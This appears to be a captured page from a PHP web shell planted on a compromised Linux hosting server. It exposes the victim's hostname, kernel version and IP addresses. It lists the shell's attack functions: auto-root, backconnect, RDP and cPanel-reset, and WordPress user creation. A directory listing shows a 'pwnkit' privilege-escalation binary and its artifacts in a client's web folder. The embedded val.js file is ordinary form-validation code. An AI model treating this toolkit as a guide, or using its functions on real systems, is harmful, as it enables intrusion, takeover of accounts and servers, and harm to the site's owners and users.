Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.227.114.85
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
jquery.min.js
86.08
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
val.js
4.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : val.js
function BeforeAjaxFormValidation(form, options) { if (window.console){ $("#"+form.attr('id')).bind("jqv.field.result", function(event, field, errorFound, prompText){ if(errorFound) return false;}); form.find(":submit").html('Sending...').attr('disabled','disabled'); } return true; } function ajaxValidationCallback(status, form, json, options) { if(status == true) { if(json.code=='1') { $("#msg").html("<div class='alert-success'><center><h4>Success!</h4>"+json.msg+"<center></div> "); $(':input', "#"+form.attr('id')).not(':button, :submit, :reset, :hidden, :radio').val('').removeAttr('checked').removeAttr('selected'); setTimeout(function(){ window.location.href="logout.php"; },2000); } else if(json.code=='2') { $("#msg").html("<div class='alert-error'><center><h4>Warning!</h4>"+json.msg+"<center></div> "); } else if(json.code=='3') { $("#msg").html("<div class='alert-success'><center><h4>Success!</h4>"+json.msg+"<center></div> "); $(':input', "#"+form.attr('id')).not(':button, :submit, :reset, :hidden, :radio').val('').removeAttr('checked').removeAttr('selected'); setTimeout(function(){ window.location.href="category.php"; },2000); } else if(json.code=='4') { $("#msg").html("<div class='alert-success'><center><h4>Success!</h4>"+json.msg+"<center></div> "); $(':input', "#"+form.attr('id')).not(':button, :submit, :reset, :hidden, :radio').val('').removeAttr('checked').removeAttr('selected'); setTimeout(function(){ window.location.href="assign-service.php"; },2000); } else if(json.code=='5') { $("#msg").html("<div class='alert-success'><center><h4>Success!</h4>"+json.msg+"<center></div> "); $(':input', "#"+form.attr('id')).not(':button, :submit, :reset, :hidden, :radio').val('').removeAttr('checked').removeAttr('selected'); setTimeout(function(){ window.location.href="index.php"; },2000); } else { $("#msg").html("<div class='alert-error' ><center> <h4>Error!</h4>"+json.msg+"</center></div>"); } } $("#msg").slideDown(400).delay(2000).slideUp(400); form.find(":submit").html('Submit').removeAttr('disabled'); } $("#myform1").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true }); $("#myform2").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true }); $("#myform3").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true }); $("#myform4").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true }); $("#myform5").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true }); $("#myform6").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true }); $("#myform7").validationEngine('attach',{ onBeforeAjaxFormValidation : BeforeAjaxFormValidation, ajaxFormValidation : true, ajaxFormValidationMethod : 'post', ajaxFormValidationURL : 'php/', onAjaxFormComplete : ajaxValidationCallback, scroll : true });
Close